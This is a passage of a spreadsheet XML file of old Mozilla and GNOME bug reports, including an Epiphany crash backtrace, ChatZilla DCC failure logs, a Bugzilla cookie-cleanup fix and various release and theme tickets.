further suggested that if this did fix my problem perhaps it was a bad
default value for my new shape and would I please submit a bug report.
Below is the defaults.dia file that caused the crash.
4.  defaults.dia that caused the problem (huge sorry)
[gab@Princess .dia]# cat defaults.dia
#/home/gab/Documents/textiles/hardanger/kloster_vertical.xcf#
</t>
  </si>
  <si>
    <t>gab</t>
  </si>
  <si>
    <t>EPIPHANY-126397</t>
  </si>
  <si>
    <t>Crash while in background</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Red Hat Linux release 9 (Shrike)
Package: epiphany
Severity: normal
Version: GNOME2.4.0 unspecified
Gnome-Distributor: GNOME.Org
Synopsis: Crash while in background
Bugzilla-Product: epiphany
Bugzilla-Component: Mozilla interaction
Bugzilla-Version: unspecified
BugBuddy-GnomeVersion: 2.0 (2.4.0.1)
Description:
I am ashamed to admit that I'm not any good at reading backtraces so I
don't know if this is a duplicate of anything I already submitted. :-/
Debugging Information:
Backtrace was generated from '/usr/bin/epiphany-bin'
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...(no debugging
symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...(no debugging
symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...(no debugging
symbols found)...
(no debugging symbols found)...(no debugging symbols found)...[New
Thread 16384 (LWP 13494)]
[New Thread 32769 (LWP 13497)]
[New Thread 16386 (LWP 13498)]
[New Thread 32771 (LWP 13499)]
[New Thread 49156 (LWP 13500)]
[New Thread 65541 (LWP 13501)]
[New Thread 98310 (LWP 13555)]
0x4066a5aa in waitpid () from /lib/i686/libpthread.so.0
#0  0x4066a5aa in waitpid () from /lib/i686/libpthread.so.0
#1  0x401682c1 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
#2  0x40041525 in nsProfileLock::FatalSignalHandler(int) () from
/usr/lib/libgtkembedmoz.so
#3  0x406694be in __pthread_sighandler () from
/lib/i686/libpthread.so.0
#4  
#5  0x40a61e06 in g_hash_table_lookup () from /usr/lib/libglib-2.0.so.0
#6  0x080ba5ad in downloader_view_new ()
#7  0x080ba5d6 in downloader_view_new ()
#8  0x40a24c70 in g_cclosure_marshal_VOID__VOID () from
/usr/lib/libgobject-2.0.so.0
#9  0x40a12ba2 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#10 0x40a24812 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#11 0x40a238ce in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#12 0x40a23c58 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#13 0x080d0a41 in MozDownload::OnProgressChange(nsIWebProgress*
nsIRequest* int int int int) ()
#14 0x41cf2f58 in NSGetModule () from
/usr/lib/mozilla-1.4/components/libdocshell.so
#15 0x41cf2e41 in NSGetModule () from
/usr/lib/mozilla-1.4/components/libdocshell.so
#16 0x41ce80b8 in NSGetModule () from
/usr/lib/mozilla-1.4/components/libdocshell.so
#17 0x411508ec in NSGetModule () from
/usr/lib/mozilla-1.4/components/libnecko.so
#18 0x411b5ca8 in NSGetModule () from
/usr/lib/mozilla-1.4/components/libnecko.so
#19 0x41138865 in NSGetModule () from
/usr/lib/mozilla-1.4/components/libnecko.so
#20 0x411385d2 in NSGetModule () from
/usr/lib/mozilla-1.4/components/libnecko.so
#21 0x400c8842 in nsInputStreamReadyEvent::EventHandler(PLEvent*) ()
from /usr/lib/mozilla-1.4/libxpcom.so
#22 0x400dd7e7 in PL_HandleEvent () from
/usr/lib/mozilla-1.4/libxpcom.so
#23 0x400dd701 in PL_ProcessPendingEvents () from
/usr/lib/mozilla-1.4/libxpcom.so
#24 0x400de877 in nsEventQueueImpl::ProcessPendingEvents() () from
/usr/lib/mozilla-1.4/libxpcom.so
#25 0x41b672e2 in NS_GetSpecialDirectory(char const* nsIFile**) () from
/usr/lib/mozilla-1.4/components/libwidget_gtk2.so
#26 0x40a89153 in g_vasprintf () from /usr/lib/libglib-2.0.so.0
#27 0x40a6aa4e in unblock_source () from /usr/lib/libglib-2.0.so.0
#28 0x40a6baa1 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#29 0x40a6bdcf in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#30 0x40a6c49e in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#31 0x402af431 in bonobo_main () from /usr/lib/libbonobo-2.so.0
#32 0x0808e1cb in main ()
#33 0x40bafa07 in __libc_start_main () from /lib/i686/libc.so.6
Thread 7 (Thread 98310 (LWP 13555)):
#0  0x40c72e57 in poll () from /lib/i686/libc.so.6
No symbol table info available.
#1  0x0811b030 in PR_OpenDir ()
No symbol table info available.
#2  0x0811f529 in _MD_CreateUnixProcess ()
No symbol table info available.
#3  0x0811c405 in PR_Select ()
No symbol table info available.
#4  0x406649b1 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
Thread 6 (Thread 65541 (LWP 13501)):
#0  0x40666845 in __pthread_sigsuspend () from
/lib/i686/libpthread.so.0
No symbol table info available.
#1  0x40666318 in __pthread_wait_for_restart_signal () from
/lib/i686/libpthread.so.0
No symbol table info available.
#2  0x40662cbb in pthread_cond_wait@GLIBC_2.0 () from
/lib/i686/libpthread.so.0
No symbol table info available.
#3  0x08117865 in PR_WaitCondVar ()
No symbol table info available.
#4  0x400e0f67 in nsThreadPool::GetRequest(nsIThread*) () from
/usr/lib/mozilla-1.4/libxpcom.so
No symbol table info available.
#5  0x400e17ae in nsThreadPoolRunnable::Run() () from
/usr/lib/mozilla-1.4/libxpcom.so
No symbol table info available.
#6  0x400e0011 in nsThread::Main(void*) () from
/usr/lib/mozilla-1.4/libxpcom.so
No symbol table info available.
#7  0x0811c405 in PR_Select ()
No symbol table info available.
#8  0x406649b1 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
Thread 5 (Thread 49156 (LWP 13500)):
#0  0x40666845 in __pthread_sigsuspend () from
/lib/i686/libpthread.so.0
No symbol table info available.
#1  0x40666318 in __pthread_wait_for_restart_signal () from
/lib/i686/libpthread.so.0
No symbol table info available.
#2  0x40662cbb in pthread_cond_wait@GLIBC_2.0 () from
/lib/i686/libpthread.so.0
No symbol table info available.
#3  0x08117865 in PR_WaitCondVar ()
No symbol table info available.
#4  0x400e3859 in TimerThread::Run() () from
/usr/lib/mozilla-1.4/libxpcom.so
No symbol table info available.
#5  0x400e0011 in nsThread::Main(void*) () from
/usr/lib/mozilla-1.4/libxpcom.so
No symbol table info available.
#6  0x0811c405 in PR_Select ()
No symbol table info available.
#7  0x406649b1 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
Thread 4 (Thread 32771 (LWP 13499)):
#0  0x40666845 in __pthread_sigsuspend () from
/lib/i686/libpthread.so.0
No symbol table info available.
#1  0x40666318 in __pthread_wait_for_restart_signal () from
/lib/i686/libpthread.so.0
No symbol table info available.
#2  0x40662cbb in pthread_cond_wait@GLIBC_2.0 () from
/lib/i686/libpthread.so.0
No symbol table info available.
#3  0x08117865 in PR_WaitCondVar ()
No symbol table info available.
#4  0x41158ac5 in NSGetModule () from
/usr/lib/mozilla-1.4/components/libnecko.so
No symbol table info available.
#5  0x41158449 in NSGetModule () from
/usr/lib/mozilla-1.4/components/libnecko.so
No symbol table info available.
#6  0x400e0011 in nsThread::Main(void*) () from
/usr/lib/mozilla-1.4/libxpcom.so
No symbol table info available.
#7  0x0811c405 in PR_Select ()
No symbol table info available.
#8  0x406649b1 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
Thread 3 (Thread 16386 (LWP 13498)):
#0  0x40c72e57 in poll () from /lib/i686/libc.so.6
No symbol table info available.
#1  0x0811b030 in PR_OpenDir ()
No symbol table info available.
#2  0x4114fb8e in NSGetModule () from
/usr/lib/mozilla-1.4/components/libnecko.so
No symbol table info available.
#3  0x41150405 in NSGetModule () from
/usr/lib/mozilla-1.4/components/libnecko.so
No symbol table info available.
#4  0x400e0011 in nsThread::Main(void*) () from
/usr/lib/mozilla-1.4/libxpcom.so
No symbol table info available.
#5  0x0811c405 in PR_Select ()
No symbol table info available.
#6  0x406649b1 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
Thread 2 (Thread 32769 (LWP 13497)):
#0  0x40c72e57 in poll () from /lib/i686/libc.so.6
No symbol table info available.
#1  0x406639ce in __pthread_manager () from /lib/i686/libpthread.so.0
No symbol table info available.
Thread 1 (Thread 16384 (LWP 13494)):
#0  0x4066a5aa in waitpid () from /lib/i686/libpthread.so.0
No symbol table info available.
#1  0x401682c1 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
No symbol table info available.
#2  0x40041525 in nsProfileLock::FatalSignalHandler(int) () from
/usr/lib/libgtkembedmoz.so
No symbol table info available.
#3  0x406694be in __pthread_sighandler () from
/lib/i686/libpthread.so.0
No symbol table info available.
#4  
No symbol table info available.
#5  0x40a61e06 in g_hash_table_lookup () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#6  0x080ba5ad in downloader_view_new ()
No symbol table info available.
#7  0x080ba5d6 in downloader_view_new ()
No symbol table info available.
#8  0x40a24c70 in g_cclosure_marshal_VOID__VOID () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#9  0x40a12ba2 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#10 0x40a24812 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#11 0x40a238ce in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#12 0x40a23c58 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#13 0x080d0a41 in MozDownload::OnProgressChange(nsIWebProgress*
nsIRequest* int int int int) ()
No symbol table info available.
#14 0x41cf2f58 in NSGetModule () from
/usr/lib/mozilla-1.4/components/libdocshell.so
No symbol table info available.
#15 0x41cf2e41 in NSGetModule () from
/usr/lib/mozilla-1.4/components/libdocshell.so
No symbol table info available.
#16 0x41ce80b8 in NSGetModule () from
/usr/lib/mozilla-1.4/components/libdocshell.so
No symbol table info available.
#17 0x411508ec in NSGetModule () from
/usr/lib/mozilla-1.4/components/libnecko.so
No symbol table info available.
#18 0x411b5ca8 in NSGetModule () from
/usr/lib/mozilla-1.4/components/libnecko.so
No symbol table info available.
#19 0x41138865 in NSGetModule () from
/usr/lib/mozilla-1.4/components/libnecko.so
No symbol table info available.
#20 0x411385d2 in NSGetModule () from
/usr/lib/mozilla-1.4/components/libnecko.so
No symbol table info available.
#21 0x400c8842 in nsInputStreamReadyEvent::EventHandler(PLEvent*) ()
from /usr/lib/mozilla-1.4/libxpcom.so
No symbol table info available.
#22 0x400dd7e7 in PL_HandleEvent () from
/usr/lib/mozilla-1.4/libxpcom.so
No symbol table info available.
#23 0x400dd701 in PL_ProcessPendingEvents () from
/usr/lib/mozilla-1.4/libxpcom.so
No symbol table info available.
#24 0x400de877 in nsEventQueueImpl::ProcessPendingEvents() () from
/usr/lib/mozilla-1.4/libxpcom.so
No symbol table info available.
#25 0x41b672e2 in NS_GetSpecialDirectory(char const* nsIFile**) () from
/usr/lib/mozilla-1.4/components/libwidget_gtk2.so
No symbol table info available.
#26 0x40a89153 in g_vasprintf () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#27 0x40a6aa4e in unblock_source () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#28 0x40a6baa1 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#29 0x40a6bdcf in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#30 0x40a6c49e in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#31 0x402af431 in bonobo_main () from /usr/lib/libbonobo-2.so.0
No symbol table info available.
#32 0x0808e1cb in main ()
No symbol table info available.
#33 0x40bafa07 in __libc_start_main () from /lib/i686/libc.so.6
No symbol table info available.
#0  0x4066a5aa in waitpid () from /lib/i686/libpthread.so.0
------- Bug moved to this database by unknown@bugzilla.gnome.org 2003-11-06 16:06 -------
Reassigning to the default owner of the component marco@gnome.org.
</t>
  </si>
  <si>
    <t>mozilla_bug_report_data.csv</t>
  </si>
  <si>
    <t>BUGZILLA-294734</t>
  </si>
  <si>
    <t>Bugzilla-General</t>
  </si>
  <si>
    <t>BUGZILLA</t>
  </si>
  <si>
    <t>Emergency 2.16.10 Release</t>
  </si>
  <si>
    <t>2.16.9 is broken -- many users can't enter bugs on it particularly not from a
fresh install. So we need to pull 2.16.9 and post a 2.16.10 instead.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-363323</t>
  </si>
  <si>
    <t>DOM Inspector</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS</t>
  </si>
  <si>
    <t>DOM View is really inefficient with setting what is to be shown</t>
  </si>
  <si>
    <t>From comment in url:
Current code:
menuitem -&gt; command -&gt; toggler -&gt; setter -&gt; pref -&gt; observer -&gt; setter -&gt; pref
Proposed code:
menuitem -&gt; command -&gt; toggler -&gt; pref -&gt; observer -&gt; setter
arguably we should rebuild() in the observer too.</t>
  </si>
  <si>
    <t>sdwilsh</t>
  </si>
  <si>
    <t>SUPPORT.MOZILLA.ORG-398246</t>
  </si>
  <si>
    <t>SUPPORT.MOZILLA.ORG</t>
  </si>
  <si>
    <t>Add support for custom cookies and cache headers</t>
  </si>
  <si>
    <t>Adding support for custom headers and cookie names involves two steps:
* making session names configurable
* disabling auto-start for sessions
This can be accomplished in tiki-setup_base.php though it means in turn that all pages dependent on the hard-coded PHPSESSID cookie along with the basic session handler all need to be refactored to not assume there is a pre-existing session.
I'm looking at re-implementing some session libs I have from before.  Should do the trick.
This is a chicken/egg problem since we want to use non-default cookie names for NS rules.  We can't have the app auto-setting the cookie while simultaneously passing cache headers.  We need to separate the behavior so it's consistent and predictable for the proxy cache.
ETA is Thurs.  This affect performance and for a couple of reasons it blocks bug 398239.</t>
  </si>
  <si>
    <t>morgamic</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-525991</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING</t>
  </si>
  <si>
    <t>Create Major Update from 3.0.15 to 3.5.5</t>
  </si>
  <si>
    <t>catlee</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-318859</t>
  </si>
  <si>
    <t>ChatZilla</t>
  </si>
  <si>
    <t>DCC functionality in ChatZilla isn't functional.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.9a1) Gecko/20051121 SeaMonkey/1.5a
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.9a1) Gecko/20051121 SeaMonkey/1.5a
No ports have been specified in the Preferences pane.
+++++
DCC receive:
[18:54:19]	sid^^	DCC Send Baby Seal face.jpg (12.39.92.135)
/dcc-accept sid^^
[18:54:22]	[INFO]	0 pending incoming DCC offers matched.
[18:54:22]	[INFO]	You must specify enough of the user's nickname to uniquely identify the request or include the request type and even the filename if necessary.
+++++
/dcc-send sid^^
{File browser comes up. Select a small .jpg.}
[ERROR]	Internal error dispatching command â€œdcc-sendâ€.
[ERROR]	TypeError: setting a property that has only a getter @  2562
+++++
/dcc-chat sid^^
[19:02:06]	[DCC]	Sent DCC Chat offer to â€œsid^^â€ from YOU (67.186.207.96:55938) [Cancel].
[19:05:06][DCC]	Aborted DCC Chat with â€œsid^^â€ (67.186.207.96:55938).
+++
The FAQ (http://www.hacksrus.com/~ginda/chatzilla/faq/chatzilla-faq.html Section 2.9) doesn't give any information about setting ports for DCC or troubleshooting. If you have anything you want me to check let me know. Next week I will have a chance to test through a different ISP.
Reproducible: Always
Steps to Reproduce:
1. Perform any dcc function.
Actual Results:  
Note that the function fails.
Expected Results:  
Sends receives and chats should connect.</t>
  </si>
  <si>
    <t>gijskruitbosch+bugs</t>
  </si>
  <si>
    <t>dafydd</t>
  </si>
  <si>
    <t>DEVELOPER.MOZILLA.ORG-416840</t>
  </si>
  <si>
    <t>DEVELOPER.MOZILLA.ORG</t>
  </si>
  <si>
    <t>Fix  and  cruft</t>
  </si>
  <si>
    <t>Since we removed the breadcrumbs and title-override extensions from developer.mozilla.org many pages now actually show
or
 JS_LookupProperty
The new wiki will fix this for the short term let's make the extensions emit nothing.</t>
  </si>
  <si>
    <t>jorendorff</t>
  </si>
  <si>
    <t>MARKETPLACE_GRAVEYARD-977729</t>
  </si>
  <si>
    <t>Reviewer Tools</t>
  </si>
  <si>
    <t>MARKETPLACE_GRAVEYARD</t>
  </si>
  <si>
    <t>add a waffle to disable the theme queue</t>
  </si>
  <si>
    <t>This is a pretty private URL so literally putting a 403 or message here is fine.  This is a quick/simple thing.</t>
  </si>
  <si>
    <t>kngo</t>
  </si>
  <si>
    <t>wclouser</t>
  </si>
  <si>
    <t>THUNDERBIRD-339875</t>
  </si>
  <si>
    <t>Build Config</t>
  </si>
  <si>
    <t>THUNDERBIRD</t>
  </si>
  <si>
    <t>ship ga-IE for 1.5.0.5</t>
  </si>
  <si>
    <t>the ga-IE locale for Thunderbird 1.5 has owner signoff and is now ready to be released. We want to allow time to smoketest the builds before we release them so I'm filing this bug to keep track of this for the next scheduled stability update 1.5.0.5.</t>
  </si>
  <si>
    <t>rhelmer</t>
  </si>
  <si>
    <t>mscott</t>
  </si>
  <si>
    <t>FIREFOX-420556</t>
  </si>
  <si>
    <t>Theme</t>
  </si>
  <si>
    <t>FIREFOX</t>
  </si>
  <si>
    <t>sidebarheader on GNOME has a transparent background</t>
  </si>
  <si>
    <t>Created attachment 306847
patch v1: fixes problem
The sidebar header on GNOME has a transparent background because its -moz-appearance: toolbox rule overrides its background-color: -moz-Dialog rule which causes problems for theming engines like Personas that expect the header to have an explicit background color as it does on Mac and Windows.
The -moz-appearance rule also overrides rules specifying top and bottom borders and it's unclear why there are these contradictory rules but the rules are the same as in winstripe where -moz-appearance does not override the other rules so perhaps they were simply copied from Windows to Linux verbatim.
In that case the intent would have been for the header to have the specified background color -moz-Dialog which we can do by simply removing the -moz-appearance.  Nevertheless that also causes the explicit border rules to be applied and I looked at three other GNOME apps with sidebars (Totem gThumb and Evolution) and none of them give their sidebar headers borders (although Evolution gives it a different background color).
Plus borders look funky with the native GTK splitter which is borderless.  So I think the header should remain borderless while fixing the background color issue which we can do by removing both the -moz-appearance rule and the top and bottom border rules.
Here's a patch that does that.
Note: there are other things I noticed while investigating this issue like that we use a widget (sidebarheader) with no XBL binding that we put its styles in toolkit/ instead of browser/ on Linux and Windows (it's in browser/ on Mac although there's at least one funky rule there as well) and that we pad the header label by four pixels on the left which causes it to be misaligned with text in the sidebar itself (f.e. the Search label in the Bookmarks sidebar).
But I'll file those as separate bugs.
Requesting wanted-firefox3 for this theme polish fix that has implications for extensibility.</t>
  </si>
  <si>
    <t>myk</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-415621</t>
  </si>
  <si>
    <t>mk / Macedonian</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS</t>
  </si>
  <si>
    <t>Firefox 3 mk release tracker</t>
  </si>
  <si>
    <t>This is a tracker bug for releasing Firefox 3 mk.
This bug is not that detailed but as we get particular work items they should block this bug for tracking and better discoverability.</t>
  </si>
  <si>
    <t>l10n</t>
  </si>
  <si>
    <t>CORE-254510</t>
  </si>
  <si>
    <t>Image Blocking</t>
  </si>
  <si>
    <t>CORE</t>
  </si>
  <si>
    <t>Bug 200433 regressed by patch in bug 253597</t>
  </si>
  <si>
    <t>The patch in bug 253597 regressed the fix from bug 200433 (the ShouldProcess
never blocks anything now).  See bug 253597 comment 9 for more information.
It'd be nice to fix this before next week's freeze...</t>
  </si>
  <si>
    <t>mvl</t>
  </si>
  <si>
    <t>bzbarsky</t>
  </si>
  <si>
    <t>CORE-204573</t>
  </si>
  <si>
    <t>HTML: Parser</t>
  </si>
  <si>
    <t>View-source highlighting is incorrect for XML an file with non-ANSI characters in tag names.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.4b) Gecko/20030502
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.4b) Gecko/20030502
Only the beginning of the tag is colored. Any non-ANSI letter stops the coloring
(the rest appears in black).
Reproducible: Always
Steps to Reproduce:
1. View an XML source with non-ANSI characters in a tag name (e. g. the attached
file).
Actual Results:  
In view-source the beginning of a tag containing non-ANSI characters appears in
purple but the couloring stops at the non-ANSI letter and then the rest of the
tag appears in black. When the first letter of the tag is a non-ANSI character
the whole tag appears in black and isn't even in bold font.
Expected Results:  
The whole tag name should be in purple.
- Also tested on Mozilla 1.3 (PC/Windows) and Mozilla 1.0 (PC/Linux)
- In the case of an XML file which is not linked to any stylesheet the main
browser window correctly highlights the file (not applicable to the linux 1.0
version which does not show the structure of the file in the browser window).
- Tested with a file saved in utf-8 utf-16 and iso-8859-1 formats (restricted
to iso-8859-1 characters).</t>
  </si>
  <si>
    <t>mrbkap</t>
  </si>
  <si>
    <t>gilles.ollivier</t>
  </si>
  <si>
    <t>THUNDERBIRD-412434</t>
  </si>
  <si>
    <t>opening a window with -chrome does not work anymore</t>
  </si>
  <si>
    <t>Hi
I have an extension whose main window is chrome://myext/content/myext.xul
I used to open it with
thunderbird -chrome chrome://myext/content/myext.xul
but now it does not work anymore: I get ReferenceError: resolveURIInternal is not defined on the console and thunderbird does not launch. Actually components/nsMailDefaultHandler.js calls resolveURIInternal but that function is defined nowhere in the file: http://mxr.mozilla.org/mozilla/source/mail/components/nsMailDefaultHandler.js#232
It seems this bug was introduced by fix for bug #395942.
If I define resolveURIInternal (by copying it from http://mxr.mozilla.org/mozilla/source/browser/components/nsBrowserContentHandler.js#83) -chrome works fine again.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS_GRAVEYARD-391445</t>
  </si>
  <si>
    <t>QA Companion</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS_GRAVEYARD</t>
  </si>
  <si>
    <t>Unsightly border around clicked tabs</t>
  </si>
  <si>
    <t>With the new skin work (thanks for that Zak!) there's a somewhat ugly border around the text after you click on a tab. We should make that go away...</t>
  </si>
  <si>
    <t>bhsieh</t>
  </si>
  <si>
    <t>FIREFOX_OS_GRAVEYARD-942470</t>
  </si>
  <si>
    <t>FIREFOX_OS_GRAVEYARD</t>
  </si>
  <si>
    <t>test_user_agent_updates.htmltest_user_agent_overrides.html intermittently fails to unset its override of the UA string | test_videocontrols_standalone.html | Height of audio element should be 28 which is equal to the controls bar. - got 123 expected 28</t>
  </si>
  <si>
    <t>See either https://tbpl.mozilla.org/php/getParsedLog.php?id=31007226&amp;tree=Try#error0 or all of bug 923597 - test_handlerApps.xhtml is disabled on OS X 10.8 by way of navigator.userAgent.indexOf(Mac OS X 10.8) != -1 but intermittently instead of including that string in the UA and thus not running that failing test we have a UA of DummyUserAgent so we run the test and fail it.
Might be a nice touch to have test_user_agent_updates.html grab the unaltered UA string at the start and test that it is back to that at the end so if this crops up again I won't have to guess that some later test is failing because we're running DummyUserAgent rather than the browser we thought we were running.</t>
  </si>
  <si>
    <t>jimnchen+bmo</t>
  </si>
  <si>
    <t>philringnalda</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-142958</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD</t>
  </si>
  <si>
    <t>oracle.usu.ru - form is submitted incorrectly in Mozilla 1.0RC1</t>
  </si>
  <si>
    <t>Sorry this page is in Russian. I'll try to explain what happens without
mentioning any text on the page or so.
The bug I've found appeared in Mozilla 1.0 Release Candidate 1 only all prior
versions works fine. 
The aim of that page is to provide web access to our University library's
catalogue. When you open the page you'll see the yellow square with several
fields and buttons. There is only one text field (for entering the search
phrase). Enter something there for example physics and press Ok button. In
Mozilla 0.9.9 and earlier versions and Internet Explorer you'll receive a list
of books which titles contains physics. In Mozilla 1.0 RC1 the form submits
new page loads but it contains no books info it's just the same as the page
what you see before submission (pay attention to the text just under the yellow
square in English it should looks like: 'XXX mathes found. Your query was:
'. As one can suppose after submitting a form this should be
like: 'XXX mathes found. Your query was physics' but in 1.0RC1 we actually
have '0 mathes found. Your query was:  ').
My little test shows that the difference between information sent on submission
in 0.9.9 and 1.0RC1 is that 0.9.9 sends 'ssub1=find' name-value pair when 'Ok'
button is pressed ('Ok' button is actually an image and has an OnClick event
document.forms[0].submit()) but 1.0RC1 does'nt. Maybe a server script
'prim.jsp' relies on this pair and when there is no filed named 'ssub1' in a
query it decides that there were no submission and returns blank form?</t>
  </si>
  <si>
    <t>CORE-128371</t>
  </si>
  <si>
    <t>Layout</t>
  </si>
  <si>
    <t>menu items on the left side are not displayed</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11 U Linux i686 en-US rv:0.9.8) Gecko/20020205
BuildID:    2002020511
Menu items which you can click on the left edge are not displayed.
This works with the latest internet explorer.
Reproducible: Always
Steps to Reproduce:
1.just display the page
2.
3.
Actual Results:  the menu items were not displayed and I could not click them
Expected Results:  It should have displayed the menu items.</t>
  </si>
  <si>
    <t>attinasi</t>
  </si>
  <si>
    <t>dharter</t>
  </si>
  <si>
    <t>SEAMONKEY-160672</t>
  </si>
  <si>
    <t>UI Design</t>
  </si>
  <si>
    <t>SEAMONKEY</t>
  </si>
  <si>
    <t>[FIX]XP filepicker's modeGetFolder looks too much like modeOpen</t>
  </si>
  <si>
    <t>The error messages could use some work as could the textfield label</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-471000</t>
  </si>
  <si>
    <t>Server Operations</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD</t>
  </si>
  <si>
    <t>qm-plinux-trunk04 needs a kick.</t>
  </si>
  <si>
    <t>Currently unreachable.</t>
  </si>
  <si>
    <t>phong</t>
  </si>
  <si>
    <t>anodelman</t>
  </si>
  <si>
    <t>CORE-459938</t>
  </si>
  <si>
    <t>Audio/Video</t>
  </si>
  <si>
    <t>Video has incorrect colours</t>
  </si>
  <si>
    <t>The video in the URL when played using  has a gray background. The background should be white as it is in other Theora players. This is a bug in the liboggplay library we use and a ticket is open for it:
http://trac.annodex.net/ticket/421</t>
  </si>
  <si>
    <t>cajbir.bugzilla</t>
  </si>
  <si>
    <t>SEAMONKEY-57480</t>
  </si>
  <si>
    <t>problem with getting back to Font size 100% after using mousewheel resize</t>
  </si>
  <si>
    <t>when changing the font size using the mouse wheel then wanting back to 100%
size you cant just use the (View-Text Size-100%) menu. It wont change the size
of the text because it wasnt set by this menu. To get back to 100% exactly is
working in 2 ways: Either use the mouse and scroll the size back to what you
'THINK' is 100% or change the size per View-Menu to anything other than 100%
then back to 100%</t>
  </si>
  <si>
    <t>ultimaonline</t>
  </si>
  <si>
    <t>BUGZILLA-58242</t>
  </si>
  <si>
    <t>User Accounts</t>
  </si>
  <si>
    <t>relogin.cgi fails to delete server's copy of the cookie</t>
  </si>
  <si>
    <t>I found it odd that relogin.cgi didn't clear out someone's entry(ies) from the
logincookies table after it logged them out relying instead on
confirm_login() to clear them after they get 30 days old.  A table can fill up
fast that way.  I've solved this by adding these two lines to relogin.cgi just
after the line that says 'require CGI.pl':
ConnectToDatabase()
SendSQL(delete from logincookies where userid= .
DBname_to_id(url_decode($::COOKIE{Bugzilla_login})))
(The url_decode is in there because I found I sometimes had %40 instead of @
in the Bugzilla_login cookie and thus it wouldn't recognize the login...)
Just wanted to share :)</t>
  </si>
  <si>
    <t>phee</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-454709</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM</t>
  </si>
  <si>
    <t>WinCE Resource Compiling Needs Shunt Application</t>
  </si>
  <si>
    <t>Created attachment 337997
Patch to add arm-wince-res.c source to VS8 and VS9 WinCE tools
In order to compile resources within the SECURITY module several pathnames have to be converted from MingW32 to Windows (i.e. /c/.... to c:/....)
This means we need a resource compiler shunt tool (arm-wince-res.exe) to do the command line conversion as well as calling the correct SDK resource compiler.</t>
  </si>
  <si>
    <t>wolfe</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-315913</t>
  </si>
  <si>
    <t>Replace RDF userlist with direct nsITreeView implementation</t>
  </si>
  <si>
    <t>This is mainly a personal rant because I've only just written the patch so I haven't had time to profile it properly but I get the feeling that Chatzilla spends too much time sorting the nick list. This is particularly evident when an op pings out what tends to happen is that you get join auto-op part and nick changes in quick succession which seems to kill my CPU.
The main thrust of my proposal is changing the tree from a content view to a builder view achieved by setting flags=dont-build-content on the tree. This already allows us to automatically sort when switching channel or when new nicks join a channel. The sort order is initialized once and then the tree maintains its sort although this can of course be toggled. Nick (and op changes in sort by op mode) are handled by removing and reinserting the nick.
Calls to updateUserList are therefore removed in setCurrentObject my_cjoin my_cmode and my_cnick although in the latter two cases calls to _removeUserFromGraph and _addUserToGraph are used to maintain the nick list.
I changed setListMode to clear the tree cache directly it appeared to be relying on some unknown side effect for its attribute change to take effect.
The only other change necessary in the current code was the code that extracts the nick from a given tree row as the builder view does not permit arbitrary attributes I had to extract the unicode name from the RDF data source. However the reverse operation of obtaining the tree row from a nick is simplified to tree.builderView.getIndexOfResource(nick.getGraphResource()).
I'm not sure what style is preferred so I tested for nsITreeColumn in my new sortUserList() method although I have only tested it on 1.8+ so far.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-516424</t>
  </si>
  <si>
    <t>MDC badly broken this morning</t>
  </si>
  <si>
    <t>MDC appears to have lost all its preferences. What's going on?</t>
  </si>
